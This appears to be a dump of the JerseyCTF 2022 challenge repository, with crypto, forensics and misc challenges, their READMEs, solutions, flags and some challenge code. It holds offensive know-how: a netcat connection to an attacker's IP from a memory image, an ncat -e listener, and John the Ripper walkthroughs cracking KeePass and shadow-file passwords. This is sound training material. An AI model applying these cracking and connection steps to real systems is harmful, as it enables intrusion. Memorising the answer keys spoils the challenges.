down here cause its more secure right? I am just the best BOSS ever. Thank me on Monday. 
285 | -------------------------------------------------------------------------------- /crypto/inDEStructible/README.md: -------------------------------------------------------------------------------- 1 | # inDEStructible 2 | 3 | ## Challenge Text 4 | * It's an older code, sir or madam, but it checks out. 5 | 6 | ## Hint 7 | * https://github.com/RobinDavid/pydes 8 | 9 | ## Solution 10 | * Find a DES encryption implementation in your language of choice and start bruteforcing keys (keyspace is 2^56, but the key is going to be < 2^22 so it shouldn't take more than 30 min to bruteforce). 11 | * The exact key was generated by taking the string 'sw' (29559 as an int) and converting it to binary, padded (pre-pending 0s) to 56-bits, and used directly as a key without the permutation. 12 | * Flag: `jctf{p4rty_l1k3_it_1977} ` 13 | 14 | ## Credit 15 | * Developed by [SpadeAsInAce](https://github.com/spade-as-in-ace) 16 | -------------------------------------------------------------------------------- /crypto/inDEStructible/challenge/clearence_code: -------------------------------------------------------------------------------- 1 | )‹™ V÷Ÿ‹ŒB_*Yb7øPåcÙÞÒÖ2 -------------------------------------------------------------------------------- /crypto/new-algorithm/README.md: -------------------------------------------------------------------------------- 1 | # new-algorithm 2 | 3 | ## Challenge Text 4 | * On the first day of the job, a new cryptography intern is insisting to upper management that he developed a new encryption algorithm for the company to use for sensitive emails and should get a raise. This seems too good to be true... are you able to prove the intern wrong by decrypting it? 5 | 6 | * Here's an example of an encrypted email message using the intern's algorithm: 7 | `amN0Znt0UllfQUVTX0lOc1QzQGR9` 8 | 9 | ## Hint 10 | * What are some differences between encryption, encoding, and hashing? 
11 | 12 | ## Solution 13 | * Recognize the usage of Base64 encoding and copy the text into a Base64 decoder: 14 | * Flag: `jctf{tRY_AES_INsT3@d}` 15 | 16 | ## Credit 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /crypto/salad/README.md: -------------------------------------------------------------------------------- 1 | # salad 2 | 3 | ## Challenge Text 4 | * Roman generals really knew how to make salad! `atkw{plddp_jrcru_uivjjzex}` 5 | 6 | ## Hint 7 | * Look up some common types of ciphers 8 | 9 | ## Solution 10 | * Put it into [dcode.fr's Caesar cipher solver](https://www.dcode.fr/caesar-cipher) and you get the flag. 11 | * Flag: `jctf{yummy_salad_dressing}` 12 | 13 | ## Credit 14 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 15 | -------------------------------------------------------------------------------- /crypto/secret-message/README.md: -------------------------------------------------------------------------------- 1 | # secret-message 2 | 3 | ## Challenge Text 4 | * There are two bank heist organizations communicating by sending images of expensive assets to each other, could there be a secret message somewhere? Along with the images, they are sending the same secret_key.txt file with encoded text. 5 | 6 | ## Hint 7 | * The employees of both organizations passed Decoding 101 in high school, but failed Encryption 101 in college. 8 | 9 | ## Solution 10 | * Open the secret_key.txt file - there will be a url encoded string. 
11 | * Take the URL-encoded string and decode it - https://www.urldecoder.org/ 12 | * The URL-decoded output is a base64 string; decode it - https://www.base64encode.org/ 13 | * The base64-decoded output is a Caesar Cipher encrypted string; decrypt it - https://www.dcode.fr/caesar-cipher 14 | * Use the steghide command to extract the hidden secret_message.txt file, using the passphrase `manchester_united_2022` to unlock it. 15 | * Command: steghide extract -sf Photo.jpg 16 | * Flag: `jctf{QbxVLJrIbP}` 17 | 18 | ## Credit 19 | * Developed by [Nishaant Goswamy](https://www.github.com/nishaant215) 20 | -------------------------------------------------------------------------------- /crypto/secret-message/challenge/Photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/secret-message/challenge/Photo.jpg -------------------------------------------------------------------------------- /crypto/secret-message/challenge/secret_key.txt: -------------------------------------------------------------------------------- 1 | WWxoc3B6YXBqaHNzZiwgZnZiIGR2dSdhIHpsbCBhb3B6IHB1IHlsaHMtZHZ5c2sganlmd2F2bnlod29mLiBEbCd5bCBqdnNzbG5sIHphYmtsdWF6IG9oY3B1biBoIG52dmsgYXB0bCwgenYgcmxsdyBudnB1biBwbSBmdmIgZGh1YSBhb2wgbXNobiEgQW9sIHdoenp3b3loemwgcHogdGh1am9semFseV9idXBhbGtfMjAyMg%3D%3D -------------------------------------------------------------------------------- /crypto/secret-message/sol/Photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/secret-message/sol/Photo.jpg -------------------------------------------------------------------------------- /crypto/secret-message/sol/secret_key.txt:
-------------------------------------------------------------------------------- 1 | WWxoc3B6YXBqaHNzZiwgZnZiIGR2dSdhIHpsbCBhb3B6IHB1IHlsaHMtZHZ5c2sganlmd2F2bnlod29mLiBEbCd5bCBqdnNzbG5sIHphYmtsdWF6IG9oY3B1biBoIG52dmsgYXB0bCwgenYgcmxsdyBudnB1biBwbSBmdmIgZGh1YSBhb2wgbXNobiEgQW9sIHdoenp3b3loemwgcHogdGh1am9semFseV9idXBhbGtfMjAyMg%3D%3D -------------------------------------------------------------------------------- /crypto/secret-message/sol/secret_message.txt: -------------------------------------------------------------------------------- 1 | Amazing you were able to crack the code. Flag: jctf{QbxVLJrIbP} 2 | -------------------------------------------------------------------------------- /crypto/would-you-wordle/README.md: -------------------------------------------------------------------------------- 1 | # would-you-wordle 2 | 3 | ## Challenge Text 4 | * Someone left this secret text string and unfinished Wordle. Can you put them together to get the flag? 5 | * pUpPHg3KfB15MG2KGtQQMDEECPOF8oa3VA== 6 | 7 | ## Hint 8 | * Ron's Code 9 | 10 | ## Solution 11 | * Solve the Wordle to get the Key = "thorn". Use the RC4 cipher (used by WEP) and the Key to decrypt the string. 
12 | * Flag: `jctf{CryptoIsTheKeyToFun}` 13 | 14 | ## Credit 15 | * Developed by [Mandy](https://github.com/mrsgcyber) 16 | -------------------------------------------------------------------------------- /crypto/would-you-wordle/challenge/Wordle-Words.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/would-you-wordle/challenge/Wordle-Words.jpg -------------------------------------------------------------------------------- /crypto/xoracle/README.md: -------------------------------------------------------------------------------- 1 | # xoracle 2 | 3 | Note: the file [xoracle.py](challenge/xoracle.py) should be provided as part of the challenge, 4 | and it should also be accessible by netcat, running in the same directory as [flag.txt](challenge/flag.txt). 5 | 6 | ## Challenge Text 7 | * Check out my cool new encryption service! It's very secure! Connect to 0.cloud.chals.io on port 19305. 8 | 9 | ## Hint 10 | * Read carefully: a small mistake or typo can be all it takes to make an encryption system insecure. 11 | 12 | ## Solution 13 | 14 | Simple XOR-based crypto challenge 15 | 16 | The program encrypts your input by XORing it with a randomly generated key. 17 | However, it tries to be lazy, and only regenerates the key if you give it an input that's longer than the current key. 18 | Before taking any input, it encrypts the flag and prints out the ciphertext. 19 | If we just give this string directly back to the program, it doesn't regenerate the key, 20 | so it gets encrypted with the same key again. 21 | XOR has a nice property: it's its own inverse; this means that encrypting twice with the same key gives back the original plaintext. 22 | Now, the program gives it to us as a hex string; we just need to convert it back to ASCII text. 23 | This can be done with Python's `binascii.unhexlify` function. 
24 | 25 | * Flag: `jctf{1_th0U9hT_1t_w45_53Cure_a07b8a01}` 26 | 27 | ## Credit 28 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 29 | -------------------------------------------------------------------------------- /crypto/xoracle/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && apt install ncat python3 -y 4 | 5 | COPY flag.txt /root 6 | 7 | COPY xoracle.py /root 8 | 9 | RUN chmod +x /root/xoracle.py 10 | 11 | ENTRYPOINT ncat -nvlp 9999 -e /root/xoracle.py -k 12 | 13 | EXPOSE 9999 14 | 15 | -------------------------------------------------------------------------------- /crypto/xoracle/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{1_th0U9hT_1t_w45_53Cure_a07b8a01} 2 | -------------------------------------------------------------------------------- /crypto/xoracle/challenge/xoracle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from os import urandom 4 | from binascii import hexlify, unhexlify 5 | 6 | class Cipher: 7 | def __init__(self): 8 | self.key = b'' 9 | def encrypt(self, data): 10 | if len(data) > len(self.key): 11 | self.key = urandom(len(data)) 12 | return bytes(a ^ b for a, b in zip(data, self.key)) 13 | 14 | cipher = Cipher() 15 | 16 | with open('/root/flag.txt', 'rb') as f: 17 | flag = f.read().strip() 18 | 19 | flag = cipher.encrypt(flag) 20 | flag = hexlify(flag) 21 | 22 | print("Welcome to my SUPER secure encryption service!") 23 | print("To show you just how secure my service is, I'm gonna GIVE you the encrypted version of my flag.") 24 | print("Why? 
Because I'm CONFIDENT you can't decrypt it.") 25 | print(f"Here it is: {flag}") 26 | print() 27 | print("Now that you've been ensured that my service is SECURE, you should give it a try!") 28 | 29 | while True: 30 | try: 31 | print("Give me some data:") 32 | inp = input() 33 | except: 34 | break 35 | try: 36 | inp = unhexlify(inp) 37 | except: 38 | print("That's not valid!") 39 | continue 40 | ct = cipher.encrypt(inp) 41 | ct = hexlify(ct) 42 | print(f"Here it is: {ct}") 43 | -------------------------------------------------------------------------------- /forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [stolen-data](stolen-data) | Someone accessed the server and stole the flag. Use the network packet capture to find it. | Look for unusual ports. 7 | | [speedy-at-midi](speedy-at-midi) | Can you find the right tool to extract the hidden data? | You wouldn't have the audacity to try using a MIDI editor, would you? 8 | 9 | ## Medium Challenges 10 | | Challenge Name | Description | Hint 11 | |:-- | :-- | :--- 12 | | [data-backup](data-backup) | The backup of our data was somehow corrupted. Recover the data and be rewarded with a flag. | Try a tool a surgeon might use. 13 | | [recent-memory](recent-memory) | Use the memory image in the Google drive link below. An attacker left behind some evidence in the network connections. Follow the attacker's tracks to find the flag. https://drive.google.com/drive/folders/1ubSx3pwHOSZ9oCShHBPToVdHjTev7hXL | Try connecting to the attacker's system. 14 | |[scavenger-hunt](scavenger-hunt) | My friend told me he hid a flag for me on this server! Server: 0.cloud.chals.io SSH port: 24052 Username: jersey Password: securepassword | If only there were a way to see all folders... even hidden ones. I wonder where passwords are typically stored on ssh servers? 
15 | 16 | 17 | ## Hard Challenges 18 | | Challenge Name | Description | Hint 19 | |:-- | :-- | :--- 20 | | [infected](infected) | A host on the network was infected with a remote access trojan. A memory image of the host can be found here: https://drive.google.com/drive/folders/1YJN9tqjKSIRcYD3Wb4ZH1xo2DlnCuJEB | No hints. 21 | | [corrupted-file](corrupted-file) | Can you find a way to fix our corrupted .jpg file? | No hints. 22 | -------------------------------------------------------------------------------- /forensics/corrupted-file/README.md: -------------------------------------------------------------------------------- 1 | # corrupted-file 2 | 3 | ## Challenge Text 4 | * Can you find a way to fix our corrupted .jpg file? 5 | 6 | ## Hint 7 | * No hints 8 | 9 | ## Solution 10 | * Use a hex editor (https://hexed.it/) and append the missing bytes to the start of the file flag_mod.jpg 11 | * Right click at the top of all the bytes and click **Insert bytes here...** 12 | * Number of bytes is 4 because jpg file signatures usually have 4 bytes at the front of the hexdump. 13 | * FF D8 FF E0 14 | * Save changes and open the file. 
15 | * Flag: `jctf{OaZdSdMo8F}` 16 | 17 | ## Credit 18 | * Developed by [Nishaant Goswamy](http://www.github.com/nishaant215) 19 | -------------------------------------------------------------------------------- /forensics/corrupted-file/challenge/flag_mod.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/corrupted-file/challenge/flag_mod.jpg -------------------------------------------------------------------------------- /forensics/corrupted-file/solution/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/corrupted-file/solution/flag.jpg -------------------------------------------------------------------------------- /forensics/data-backup/README.md: -------------------------------------------------------------------------------- 1 | # data-backup 2 | 3 | ## Challenge Text 4 | * The backup of our data was somehow corrupted. Recover the data and be rewarded with a flag. 5 | 6 | ## Hint 7 | * Try a tool a surgeon might use. 
8 | 9 | ## Solution 10 | 11 | * Carve files from corrupted zip 12 | ``` 13 | foremost -i data-backup -o recover 14 | ``` 15 | 16 | * Fix broken zip 17 | ``` 18 | cd recover/zip 19 | ``` 20 | 21 | ``` 22 | zip -FF 00001490.zip --out fixed.zip 23 | ``` 24 | 25 | * Flag is in the PDF file flag.pdf 26 | * Flag: `jctf{fun_w17h_m461c_by735}` 27 | 28 | ## Credit 29 | * Developed by [Rob](https://github.com/njccicrob) 30 | -------------------------------------------------------------------------------- /forensics/data-backup/challenge/data-backup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/data-backup/challenge/data-backup -------------------------------------------------------------------------------- /forensics/infected/README.md: -------------------------------------------------------------------------------- 1 | # infected 2 | 3 | **Challenged by NJCCIC** 4 | 5 | ## Challenge Text 6 | * A host on the network was infected with a remote access trojan. A memory image of the host can be found [here](https://drive.google.com/drive/folders/1YJN9tqjKSIRcYD3Wb4ZH1xo2DlnCuJEB). 7 | * The flag is the process name followed by the PID. Format jctf{processname.exe:1234} 8 | * Backup download: https://drive.google.com/drive/folders/1lFkHr1uDy6nBl9zqA6njsLQVqtoJOG04?usp=sharing 9 | 10 | ## Hint 11 | * No hints 12 | 13 | ## Solution 14 | * A few ways to solve this one. If you list the running processes from the memory image using 'vol -f ~/infected.mem windows.pslist' you will see an svchost.exe process that was launched from cmd.exe which is not normal. svchost.exe with the PID is the flag. 15 | 16 | Another way, you can run 'vol -f ~/infected.mem windows.malfind' which comes back with a few processes that are possibly infected svchost.exe being the correct one. 
17 | 18 | 19 | * Flag: `jctf{svchost.exe:7756}` 20 | 21 | ## Credit 22 | * Developed by [Rob Bruder](https://github.com/njccicrob) 23 | -------------------------------------------------------------------------------- /forensics/recent-memory/README.md: -------------------------------------------------------------------------------- 1 | # recent-memory 2 | 3 | ## Challenge Text 4 | * Use the memory image in the Google drive link below. An attacker left behind some evidence in the network connections. Follow the attacker's tracks to find the flag. 5 | 6 | https://drive.google.com/drive/folders/1ubSx3pwHOSZ9oCShHBPToVdHjTev7hXL OR https://drive.google.com/drive/folders/192ELa6W5OZyeWi3DlRd-_TndzN2p_Xz8?usp=sharing 7 | 8 | ## Hint 9 | * Try connecting to the attacker's system. 10 | 11 | ## Solution 12 | * The flag can be obtained two ways. Find the nc.exe session in the memory dump and connect to the same host using netcat. 13 | 14 | vol -f ~/recent-memory.mem windows.netstat 15 | nc -nv 161.35.53.62 5283 16 | 17 | Or you can dump the nc.exe process memory and using strings to find the flag. 18 | 19 | * Flag: `jctf{f0ll0w_7h3_7r41l}` 20 | 21 | ## Credit 22 | * Developed by [Rob Bruder](https://github.com/njccicrob) 23 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/README.md: -------------------------------------------------------------------------------- 1 | # scavenger-hunt 2 | 3 | ## Challenge Text 4 | * My friend told me he hid a flag for me on this server! Server: 0.cloud.chals.io SSH port: 24052 5 | * Username: jersey 6 | * Password: securepassword 7 | 8 | ## Hint 9 | * If only there were a way to see all folders... 
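even hidden ones 10 | * I wonder where passwords are typically stored on ssh servers 11 | 12 | ## Solution 13 | * Run `ls` to find the `folder` folder in `/home/jersey/jersey` and cd into it 14 | * Run `ls -a` to find the hidden `.secret_folder` folder inside of `folder` and cd into it 15 | * Read the file `flag.txt` inside of `.secret_folder` with cat, which tells you to look at the users and their passwords 16 | * Read `/etc/passwd` using cat and find that the last user is `hey_that_package_is_sus` 17 | * Look through the installed packages (i.e. with the command `apt search flag`) and find the custom package called `notaflag` 18 | * Run `apt info notaflag` to read its description, which directs you to its manual 19 | * Run `man notaflag` to read the man pages and under BUGS is the flag 20 | * Flag: `jctf{f1n4LLy_f0uND_1T}` 21 | 22 | ## Credit 23 | * Developed by Penelope 24 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/Dockerfile: --------------------------------------------------------------------------------
# Build stage: compile src.c and package the notaflag_1.0-1 tree as a .deb.
FROM ubuntu:20.04 AS build

RUN apt-get update -y && apt-get install -y gcc
COPY package/ /tmp/build
WORKDIR /tmp/build

RUN mkdir -p notaflag_1.0-1/usr/local/bin
RUN gcc src.c -o notaflag_1.0-1/usr/local/bin/jersey
RUN chmod 555 notaflag_1.0-1/usr/local/bin/jersey

# The man page that carries the flag is shipped gzip-compressed inside the package.
RUN gzip notaflag_1.0-1/usr/share/man/man1/notaflag.1

RUN dpkg-deb --build notaflag_1.0-1

# Runtime stage: the SSH host that players log in to.
FROM ubuntu:20.04

RUN apt update && apt install -y openssh-server
RUN yes | unminimize
RUN mkdir /var/run/sshd
# Give root a random 32-character password generated at build time.
# The command substitution has to sit inside double quotes: in single quotes the
# shell passes the `$(...)` text through unexpanded, so root's password would be
# that literal string, which is published with this Dockerfile.
# An alphanumeric alphabet keeps the value free of spaces and ':' separators.
RUN echo "root:$(< /dev/urandom tr -cd '[:alnum:]' | head -c 32)" | chpasswd

# sshd hardening: verbose logging, password-only auth (public keys off), no X11.
RUN sed -i 's/#LogLevel INFO/LogLevel VERBOSE/' /etc/ssh/sshd_config
RUN sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication no/' /etc/ssh/sshd_config
RUN sed -i 's/X11Forwarding yes/X11Forwarding no/' /etc/ssh/sshd_config
# Restrict SSH logins to the challenge account. This must be appended to
# /etc/ssh/sshd_config, the file the sed lines above edit and the one sshd reads
# when started without -f (see CMD); writing to /etc/sshd_config only creates an
# unused file and the restriction never applies.
RUN echo "AllowUsers jersey" >> /etc/ssh/sshd_config
# Make pam_loginuid optional and replace the pam_motd session entries with '#'.
RUN sed -i 's/session\s*required\s*pam_loginuid.so/session optional pam_loginuid.so/g' /etc/pam.d/sshd
RUN sed -i 's/session\s*optional\s*pam_motd.so/#/g' /etc/pam.d/sshd

ENV NOTVISIBLE "in users profile"
RUN echo "export VISIBLE=now" >> /etc/profile

# Challenge account; its credentials are given to players in the challenge text.
RUN useradd --create-home --shell /bin/bash jersey
RUN echo 'jersey:securepassword' | chpasswd
# A minimum password age of 9999 days keeps players from changing the shared password.
RUN passwd jersey --mindays 9999

RUN touch /home/jersey/.hushlogin
RUN chown -R jersey:jersey /home/jersey
# Remove write permission recursively from the home directory.
RUN chmod -w -R /home/jersey

# Install the package built in the first stage, plus man and less to read its manual.
WORKDIR /tmp
COPY --from=build /tmp/build/notaflag_1.0-1.deb .
RUN apt install -y man less ./notaflag_1.0-1.deb
RUN rm ./notaflag_1.0-1.deb

COPY files /home/jersey/jersey
RUN echo "cd /home/jersey/jersey" >> /home/jersey/.bashrc

# Remove the execute bit from /usr/bin/ssh*; sshd itself is started from /usr/sbin.
RUN chmod -x /usr/bin/ssh*

# System account whose name is the hint players find in /etc/passwd.
RUN useradd --system hey_that_package_is_sus

EXPOSE 22
CMD ["/usr/sbin/sshd","-D"]
-------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/files/folder/.secret_folder/flag.txt: -------------------------------------------------------------------------------- 1 | omg it's the flag! 2 | 3 | jk 4 | but hey i heard there was some fishy business with the users' passwords 5 | maybe give it a look? 6 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/package/notaflag_1.0-1/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: notaflag 2 | Version: 1.1 3 | Section: misc 4 | Priority: extra 5 | Architecture: amd64 6 | Maintainer: Cool Person 7 | Description: gives you important info about ctfs (but its not a flag) 8 | someone told me to look at my manual. 9 | kinda sus. 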
10 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/package/notaflag_1.0-1/usr/share/man/man1/notaflag.1: -------------------------------------------------------------------------------- 1 | .TH notaflag 1 2 | .SH NAME 3 | notaflag - an application that is sadly, not a flag 4 | .SH SYNOPSIS 5 | .B notaflag 6 | .SH DESCRIPTION 7 | This app is cool. 8 | But it would be cooler if it were a flag 9 | .SH BUGS 10 | .BR notaflag " is not a flag" 11 | .RB " but this is a flag: jctf{f1n4LLy_f0uND_1T}" 12 | .SH AUTHOR 13 | Cool Person 14 | -------------------------------------------------------------------------------- /forensics/scavenger-hunt/challenge/package/src.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | setbuf(stdout, NULL); 6 | setbuf(stdin, NULL); 7 | setbuf(stderr, NULL); 8 | 9 | puts("Man this would be really cool if this were a flag."); 10 | puts("Wouldn't this be nice if it were a flag?"); 11 | puts("Tragic."); 12 | } 13 | -------------------------------------------------------------------------------- /forensics/speedy-at-midi/README.md: -------------------------------------------------------------------------------- 1 | # speedy-at-midi 2 | 3 | ## Challenge Text 4 | * Your partner-in-crime gets a hold of a MIDI file, `riff.mid`, which intelligence officials claim to contain confidential information. He has tried opening it in VLC Media Player, but it sounds just like the piano riff in `riff.mp3`. Can you find the right tool to extract the hidden data? 5 | 6 | ## Hint 7 | * You wouldn't have the audacity to try using a MIDI editor, would you? 8 | 9 | ## Solution 10 | * Open up `riff.mid` in [Audacity](https://www.audacityteam.org/), a free and open-source audio editor. 11 | * Zoom and scale the window in order to reveal the hidden MIDI track message. 
12 | * The reason why the MIDI track cannot be heard in the `riff.mp3` is that the volume of the track with the hidden message is set to zero. 13 | * You can verify this by playing back using [VLC Media Player](https://www.videolan.org/). 14 | * Flag: `jctf{kicking_it_since_1983}` 15 | 16 | ## Credit 17 | * Developed by [Robert Argasinski](https://github.com/ra536) 18 | -------------------------------------------------------------------------------- /forensics/speedy-at-midi/challenge/riff.mid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/speedy-at-midi/challenge/riff.mid -------------------------------------------------------------------------------- /forensics/speedy-at-midi/challenge/riff.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/speedy-at-midi/challenge/riff.mp3 -------------------------------------------------------------------------------- /forensics/stolen-data/README.md: -------------------------------------------------------------------------------- 1 | # stolen-data 2 | 3 | ## Challenge Text 4 | * Someone accessed the server and stole the flag. Use the network packet capture to find it. 5 | 6 | ## Hint 7 | * Look for unusual ports. 8 | 9 | ## Solution 10 | * Open the pcap with Wireshark. 11 | 12 | * Follow the TCP stream for port 4444 and export the data as raw. 
13 | 14 | * Flag is in the PDF file flag.pdf 15 | * Flag: `jctf{0v3r_7h3_w1r3}` 16 | 17 | ## Credit 18 | * Developed by [Rob](https://github.com/njccicrob) 19 | -------------------------------------------------------------------------------- /forensics/stolen-data/challenge/stolen_data.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/forensics/stolen-data/challenge/stolen_data.pcap -------------------------------------------------------------------------------- /makeChallenge.py: -------------------------------------------------------------------------------- 1 | """ 2 | filename: makeChallenge.py 3 | Purpose: To automate the creation of challenges on the repository. 4 | Usage: python3 makeChallenge.py 5 | Return(s): 6 | ./ 7 | .//challenge 8 | .//README.md 9 | --> # 10 | """ 11 | 12 | import sys 13 | import os 14 | 15 | def usage(): 16 | print(f"Be sure to have a Challenge Name!") 17 | print(f"Usage:") 18 | print(f"python3 makeChallenge.py ") 19 | 20 | 21 | # Quick Function to make a file 22 | makeFile = lambda file: open(file, "x") 23 | 24 | # main -> Returns a standardized process for a single challenge 25 | def main(challenge_name): 26 | README = f"{challenge_name}/README.md" 27 | 28 | # Creates `./` 29 | os.mkdir(f"{challenge_name}") 30 | 31 | # Creates `.//challenge` 32 | os.mkdir(f"{challenge_name}/challenge") 33 | 34 | # Creates `.//README.md` 35 | makeFile(f"{README}") 36 | 37 | with open(f"{README}", "r+") as f: 38 | f.write(f"# {challenge_name}\n\n") 39 | f.write(f"## Challenge Text\n") 40 | f.write(f"* \n\n") 41 | f.write(f"## Hint\n") 42 | f.write(f"* \n\n") 43 | f.write(f"## Solution\n") 44 | f.write(f"* \n") 45 | f.write(f"* Flag: `jctf{{}}`\n\n") 46 | f.write(f"## Credit\n") 47 | f.write(f"* Developed by [INSERT NAME HERE](INSERT GITHUB PROFILE LINK HERE)") 48 | 49 | # Ensures that users are using the 
program correctly 50 | if __name__ == "__main__": 51 | try: 52 | challenge_name = sys.argv[1] 53 | main(challenge_name) 54 | except: 55 | usage() 56 | -------------------------------------------------------------------------------- /misc/README.md: -------------------------------------------------------------------------------- 1 | # Misc 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [firewall-rules](firewall-rules) | A network administrator configured a device's firewall, make sure external hosts aren't able to exploit allowed insecure ports. | Sometimes Google searches lead to numbers! 7 | | [snort-log](snort-log) | The company network administrator recently deployed Snort on our network and immediately received 575 alerts in the log file. To put it lightly, every attack out there is infecting the network. | Seems like the extra network traffic is primarily inbound, not outbound. 8 | | [we-will](we-will) | A flag was left behind but it seems to be protected. | The challenge name should help you figure out how to open it. 9 | | [filtered-feeders](filtered-feeders) | The fishing net caught plenty of herrings, but the flag is nowhere to be found! Try to find the flag within the pile of fish. | How do you hide an image within an image? 10 | 11 | ## Medium Challenges 12 | | Challenge Name | Description | Hint 13 | |:-- | :-- | :--- 14 | | [bank-clients](bank-clients) | There was a password-protected client database discovered on a stolen bank computer. | There is a Desktop sticky note that says "wyptbt lza zlwalt". 15 | | [dnsmasq-ip-extract](dnsmasq-ip-extract) | Extract all unique IPs, hash each IP, and write the IP + hash to a text file. | Verify that the end of your file has a new blank line. 16 | | [check-the-shadows](check-the-shadows) | Someone in operations recovered fragments of an important file from 142.93.56.4 when it was undergoing maintenance. 
| John once said that "any group is only as strong as the weakest link." 17 | 18 | ## Hard Challenges 19 | | Challenge Name | Description | Hint 20 | |:-- | :-- | :--- 21 | | [root-me](root-me) | SSH into the challenge host, 0.cloud.chals.io on port 19777. Username: ubuntu Password: jctf2022! Read the /root/flag.txt file! | No hints. 22 | -------------------------------------------------------------------------------- /misc/bank-clients/README.md: -------------------------------------------------------------------------------- 1 | # bank-clients 2 | 3 | ## Challenge Text 4 | * While in Rome, a few heisters spotted a computer in the dumpster outside of a bank and took it. After brute forcing the computer credentials and getting in with "admin/password", there was a password-protected client database discovered. A Desktop sticky note had the following information: "To fellow bank employee - a way to remember each database PIN is that it is 4-digits ranging between 1000 and 9999". It appears the sticky note was auto-translating from another language as well - let's turn that off. Are you able to assist the heisters from here? 5 | 6 | ## Hint 7 | * After scrolling down, there was additional text on the Desktop sticky note that says "wyptbt lza zlwalt". These bank employees should be removed from the payroll immediately... 8 | 9 | ## Solution 10 | * Utilize the keepass2john John the Ripper tool to get a password hash from the .kdbx file. `keepass2john clients.kdbx > keepassHash.txt` 11 | * Use a [caesar cipher decoder](https://www.dcode.fr/caesar-cipher) on "wyptbt lza zlwalt" to get "primum est septem", which means "the first one is seven" in English after being translated from Latin on Google Translate. Rome is connected to the caesar cipher and also to the Latin language. 12 | * Narrow the PIN list down to the range of 7000-7999 based on this finding. This output list can be made in a simple Python script, but other methods work equally fine. 
For example: 13 | ``` 14 | for i in range(7000, 7999): 15 | print(i) 16 | ``` 17 | * Type `python3 listScript.py > database-passwords.txt` to send the output to a text file. 18 | * Run John the Ripper on the password hash using the PIN range via `john --wordlist=database-passwords.txt keepassHash.txt` 19 | * Hashcat is also an option 20 | * After a few minutes, PIN: 7182 21 | * Enter 7182 into the KeePass database file and the flag is labeled. 22 | * Flag: `jctf{R1ch_p3rson_#4}` 23 | 24 | ## Credit 25 | * Developed by [Logan](https://github.com/Git-Logan) 26 | -------------------------------------------------------------------------------- /misc/bank-clients/challenge/clients.kdbx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/bank-clients/challenge/clients.kdbx -------------------------------------------------------------------------------- /misc/check-the-shadows/README.md: -------------------------------------------------------------------------------- 1 | # check-the-shadows 2 | 3 | ## Challenge Text 4 | * Someone in operations recovered fragments of an important file from 142.93.56.4 when it was undergoing maintenance. Intel has it that one of the users has some valuable information. SSH into the server and retrieve it. 5 | 6 | ## Hint 7 | * John once said that "any group is only as strong as the weakest link." 8 | 9 | ## Solution 10 | * Given a shadow file with the many users of an organization, it could take weeks to brute-force all of the passwords, even with an HPC cluster. If a single user has a weak password, the entire system is vulnerable. 11 | * Use John the Ripper (or Hashcat, or other equivalent) to carry out a dictionary attack on the given shadow file. As soon as a vulnerable password is found, ssh into the server using that username and password. 
